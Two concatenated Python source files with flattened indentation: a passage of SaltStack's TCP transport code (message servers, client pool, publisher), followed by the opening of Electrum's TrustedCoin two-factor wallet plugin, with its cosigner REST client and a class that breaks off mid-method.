self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
ssl_options=self.opts.get('ssl'))
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
        Handle incoming messages from underlying TCP streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.io_loop = tornado.ioloop.IOLoop.current()
self.clients = []
self.message_handler = message_handler
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.clients.remove((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.clients.remove((stream, address))
stream.close()
def shutdown(self):
'''
Shutdown the whole server
'''
for item in self.clients:
client, address = item
client.close()
self.clients.remove(item)
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
self._stop.set()
self.thread.join()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(resolver=resolver)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
max_buffer_size=max_buffer_size)
if tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.close()
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
elif self.io_loop != tornado.ioloop.IOLoop.current(instance=False):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self.io_loop.stop()
)
self.io_loop.start()
finally:
orig_loop.make_current()
self._tcp_client.close()
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
def __del__(self):
self.close()
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {'source_ip': self.source_ip,
'source_port': self.source_port}
else:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
**kwargs)
self._connecting_future.set_result(True)
break
except Exception as e:
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
            # if the connection is dead, let's fail this send and make sure we
            # attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
def __del__(self):
self.close()
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
def __del__(self):
self.close()
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get('log_queue')
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get('log_queue_level')
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue()
)
kwargs['log_queue_level'] = (
salt.log.setup.get_multiprocessing_logging_level()
)
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual asynchronous interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
if isinstance(load['tgt'], six.string_types):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
                # Send the list of minions through so zmq can target them
int_payload['topic_lst'] = match_ids
else:
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import base64
import hashlib
import time
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrum
from electrum import bitcoin
from electrum import constants
from electrum import keystore
from electrum.bitcoin import *
from electrum.mnemonic import Mnemonic
from electrum import version
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugins import BasePlugin, hook
from electrum.util import NotEnoughFunds
from electrum.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
    def send_request(self, method, relative_url, data=None, headers=None):
        kwargs = {'headers': dict(headers) if headers else {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
        Ask the remote server to co-sign a transaction for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
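# Minimal usage sketch for the cosigner client above (hedged; the id, transaction hex
# and OTP values here are placeholders, and network access to the TrustedCoin API is assumed):
#   tos = server.get_terms_of_service()
#   billing = server.get(short_id)                 # short_id as returned by get_user_id()
#   result = server.sign(short_id, raw_tx, otp)    # raw_tx: hex transaction, otp: 6-digit code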
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self.auth_code = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
